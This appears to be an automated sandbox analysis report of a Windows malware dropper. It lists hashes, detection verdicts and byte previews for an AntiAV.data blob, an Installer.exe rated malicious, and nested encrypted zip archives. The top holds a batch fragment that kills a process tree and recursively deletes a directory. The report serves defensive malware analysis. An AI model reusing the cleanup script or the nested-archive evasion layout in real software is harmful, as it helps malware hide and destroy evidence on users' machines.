                                                                                                                                                                                SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2343406
                                                                                                                                                                                Entropy (8bit):5.89551469554261
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xR:R9kqGu7okoZscCnf0/Zs9k
                                                                                                                                                                                MD5:AEFFE98F08187C1796B0C19E28AFF08F
                                                                                                                                                                                SHA1:418740DFB8FA1EA685F78D7641586FCA0417BF8F
                                                                                                                                                                                SHA-256:6659A9416A334434BDE5035F119D84E7FFDC74C0B1364650E0A323AFB191FD87
                                                                                                                                                                                SHA-512:29F085F81CEF17F233103AC553199EED25C81E89CB8EB9DF4F24B32C68763DCF7498B50ABA10252496B2F19587B57885365019AE694BBE5BD6EACAD8E25AF370
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):625464
                                                                                                                                                                                Entropy (8bit):7.5510269559180125
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:dAcRtQRBRwAI/GE+g19EggvGkKj0cRgzAI/GE+g19EggvGkKj0cRgJ:rjybIeXuugoKocKUIeXuugoKocKJ
                                                                                                                                                                                MD5:89A069871324D35E25922F6FB881D514
                                                                                                                                                                                SHA1:985F31CD2E5B7B6C5AB6FF41CE33837987A06171
                                                                                                                                                                                SHA-256:7FAF92E0275F06214930A5EBBE11F1E98781CCD7CF4B95A0C23E5FCB013AD1AB
                                                                                                                                                                                SHA-512:9D8E49DE5D5947E8CC682CC70D81191B380260233F26EAB25BEB1398F745EF47EA297A4AAD6D0B30F87AC65EC5B90B5E4516AFABF57CCB519BC4FF6A002D1566
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......//.kN..kN..kN...%..aN...%...N...%..yN..9;..zN..9;..zN..9;..CN...%..bN..kN..0N..=;..jN..=;y.jN..kN..jN..=;..jN..RichkN..........................PE..L....v:a.................&...X)..............@....@...........................*.....^B....@.....................................d.....).................8.....*........8...............................@............@..H............................text...)%.......&.................. ..`.rdata...x...@...z...*..............@..@.data.....'.........................@....rsrc.........).....................@..@.reloc........*.....................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):511531
                                                                                                                                                                                Entropy (8bit):7.998133089879453
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:J3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:lFmr9DV6TJpZxXEL9rNX7
                                                                                                                                                                                MD5:392805D581FCA99EDCB5F947E3EBB2CC
                                                                                                                                                                                SHA1:49506423DE1FE1A89C50BF492E57998A590B9EE6
                                                                                                                                                                                SHA-256:4A4CD834312421431D41AA5A988FC2FBBCA4165961F9B023CFC2B21EFAD858ED
                                                                                                                                                                                SHA-512:7D191C9D592739BA54AD6D0BEEA26790B5020CEFAD5AD778FDB5695C13E848E7EFBFE43A1C9DA098DB1AE5E3BC758924746A3CAC2CE5C8AAE1371EBBBF50746A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d.....i^....XT.7._=9d.as....O3PdW.;%..,.V.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_10.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512845
                                                                                                                                                                                Entropy (8bit):7.998150131603083
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:B/3FvrlOjguZKmxM1J/NPT5R82orQYR7truFC/Hd:BvFojtZ/u1JlPTLexxrD/d
                                                                                                                                                                                MD5:0067A8449FAD7927F7CCD78AD32DDC6C
                                                                                                                                                                                SHA1:53BF7574BF168C644D40E2404F2346528FB16F18
                                                                                                                                                                                SHA-256:CFAEEED5348C9AC2D172D31FD2CDFFB253D6BCBE44FC325D490BC368F5229989
                                                                                                                                                                                SHA-512:6D6D9734833DE212E92C242E08EEEE4BB6D8CEAC2EE6F2AC0BAFA30573E0EFBC8A1EF0DE071B71950D9AB3A524580BC9EEC9EB420E6AFA8A2711EF248372AF14
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y.I............file_9.zipd.Sl-l....;..S..]....m.v...m.;Hf2......|w.b-%Yp.8..>.;.m...Z.yh.....o3............9h...?......f..,4.?....o...._.\..I..&...?...a.&.!y[gggR.......R....7...}.......9g...i.;....E.._...;.S../.....!..-.l..g-.G...e....z'{.....X..5?......O..u...G....?.@..*0d..&l.FBVX.;2(P.#...$.......F..V..#.....VZ...p.....JNL...7~.d.Q&..../...+2..].a9..Oe........W..z ....lrh'G.+..$Y..........)|......W.W.{..O...I.F.=....{$....m...F|.<.......6n._.......U.z.H<l.*..6.<...S.V.......?'_........Dpw..@.....].L....j.....|J..........u....w.l.....,_.............e-)..I.y.....VK...-\z.b..:O..b.E.=]..c.....|.k.6`xo.[.'.B.7Z.$..B2L"....k....acN.........W.k..W......5.....f..~...<>............*T.h.u...](p..v..i...../d.....6.;.0.. ..l1....-KkJK..n..3.id..it...'...b...m....H.....]...1..%.bKO9...-..&D].[.O;....]....Bro..m...?,..(.`.....m.D..m.....v..ue......+...9yN.Cy=.U.|.V.....sl|.S..Go. .H.=.!?..V....),..w....wG...Q9.L.5...0..

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_11.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2180530
                                                                                                                                                                                Entropy (8bit):7.99835792425981
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:49152:fujCK3D0AC/l5mwbBkDWYb1ZN4UJ9oc0/uNUrT1:faR3D0Ae5mwdkDWm1Xoe4T1
                                                                                                                                                                                MD5:7632984F9B26DBB8923DA2348366665B
                                                                                                                                                                                SHA1:C99703AD6DB21039BA169A60C106A08B2BCDB139
                                                                                                                                                                                SHA-256:69B1C0618D5418CE0E37171191F4AE23986B56779116ED29C3417089654FA897
                                                                                                                                                                                SHA-512:543750B4FD6BC31884296D8CF0BF8DAF56A90ED4223BD7B7650DC2B668DA4965718F1511459A2900AB8D975923256918415076A2F7E0FF2FAA454522097B1E95
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y.F._Cq....#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):511685
                                                                                                                                                                                Entropy (8bit):7.998145921569035
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:u3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:YFmr9DV6TJpZxXEL9rNX7
                                                                                                                                                                                MD5:BD4D86CA5CBAE5438024F64045DB97F6
                                                                                                                                                                                SHA1:67BA58848842592A9E2F8DD2D1ED97FD3E7D38CB
                                                                                                                                                                                SHA-256:C64F47CE2527018D5D52CCFEA53103762A1D91146D09938237215AF6968DFAB3
                                                                                                                                                                                SHA-512:4B5DCE84CDF649CDDFA499A6F875FB00676051E650178A0A742EEA62B91CFF0055CF6B5D2C1517AC500398D531A6F4A02131ED9CCD135B3C4A5BA18D4E2DDCE7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d...

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):511839
                                                                                                                                                                                Entropy (8bit):7.998154920833029
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:E3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lj:SFmr9DV6TJpZxXEL9rNXj
                                                                                                                                                                                MD5:8854D4E74C1AE01EAA463330A17CF2BD
                                                                                                                                                                                SHA1:9BFAB26E3B7CC05E4D94DE9930FD1428395458F3
                                                                                                                                                                                SHA-256:DF9ADC70A263FCEBE4F6EF88404AC0ACF424F2596F3F191A2FFB752B9D4BB064
                                                                                                                                                                                SHA-512:8C45E9A2F2187FA94DA24835B8F318741F682962211BFDEC5E5BA912112B5717DB4E4AED6E128C985FBEA016980F071D4961549F680B9FE0AB97884FA6559A0A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):511993
                                                                                                                                                                                Entropy (8bit):7.998157069875339
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:V3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lk:pFmr9DV6TJpZxXEL9rNXk
                                                                                                                                                                                MD5:FEA1BC14AFA3E37F1E15EB337E72B12C
                                                                                                                                                                                SHA1:148F4DEBB7F4E31EE7C1C04A11C45B0083043156
                                                                                                                                                                                SHA-256:6C1795FC843B77D29BD5F103DFC100C8928B7551F01FD8135F21C078B8533A7F
                                                                                                                                                                                SHA-512:07BCF6FC543D31B6902CA156C3F84A34FE421A8056DDC6533CD32D67B1C3D10A554556C2C28EA656EC4540EDD3B82FE4C5F677115F7C1BBFE4BE7E0CC57CA1A3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512147
                                                                                                                                                                                Entropy (8bit):7.998155444192939
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:w3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L4:GFmr9DV6TJpZxXEL9rNX4
                                                                                                                                                                                MD5:FC6106C411428E421DE593673892B72F
                                                                                                                                                                                SHA1:B5C1F38E1198E26FA2C2B786000E797676794045
                                                                                                                                                                                SHA-256:C165A3D777629605669D5C7AC7D55240A8DF0CB59686DD91D8A6111C03C67EBE
                                                                                                                                                                                SHA-512:BF46CA3B6E8DFED16CD701E05E194EB77B7E94FDE74DB260C7E9F679768DD7A1D516A20DE5ECE5E04B850D9582127A883F174C22CD2F47786EB53258EE4DD4A4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y...............file_4.zipPK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512233
                                                                                                                                                                                Entropy (8bit):7.99811336541424
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:33Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNK:HFy5fZdkDJv73bChNrTRK
                                                                                                                                                                                MD5:DFCB1DBB6A046FD464412CCD1DAE66FE
                                                                                                                                                                                SHA1:512DBB73C6BDC9DB181C48BC3BADDFCB36BD018F
                                                                                                                                                                                SHA-256:0CC1DD7548213C1868612CDB992F566AA701D77A9AE018C709C450561DD22AD9
                                                                                                                                                                                SHA-512:AF57425587F0590E80386BC947A06330F785B1130A4CC34AAA48008EB74D17F5618D59FBBD796CFCB2F2B207CC07413E0878FFFB625239ABE2869B653F9F9780
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....n.....N,.;..h..n.w..U.........c>.Bo*.

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512387
                                                                                                                                                                                Entropy (8bit):7.998123873104573
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:H3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNV:XFy5fZdkDJv73bChNrTRV
                                                                                                                                                                                MD5:B7C74415382E8A9078A3A9467BD12517
                                                                                                                                                                                SHA1:69E51182E425ED6A13D0D021B0BAD8301A1792F5
                                                                                                                                                                                SHA-256:4BF6B02FE0358DC56339BBC0A26ABE7BE1ABED63B74EB975EC76C356952BDE5B
                                                                                                                                                                                SHA-512:3E3EDB65B5A2BB69B769922D71259ACA795DE6C84C64458FE4DEB4236BCAB6B7A9919955B72E34D720B4D84445CEF23B081FBE5A7688B6CDD25DE5200D96F361
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_8.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512541
                                                                                                                                                                                Entropy (8bit):7.998130338127172
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:g3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNM:2Fy5fZdkDJv73bChNrTRM
                                                                                                                                                                                MD5:C9C7BB282A5727DA7E9E1F4E9D8D3FBA
                                                                                                                                                                                SHA1:79B0AA3EEB4E3A998B357DAC97473948F68EF773
                                                                                                                                                                                SHA-256:BE879EFDEC472650B101D7BAFE4A1903A7CDDDB8A623A154921C230014D1A19E
                                                                                                                                                                                SHA-512:E96D16A720B7EE79FE0E059E00A26D833A7B2DB7F58B5220B5E0131A4A5DED923AD59B9BF500E46BAEFCCB8EE0F354CAF9F737CF0371F6AA47C92F3EABB63AA7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_9.zip

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):512695
                                                                                                                                                                                Entropy (8bit):7.998132491458882
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:U3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNw:iFy5fZdkDJv73bChNrTRw
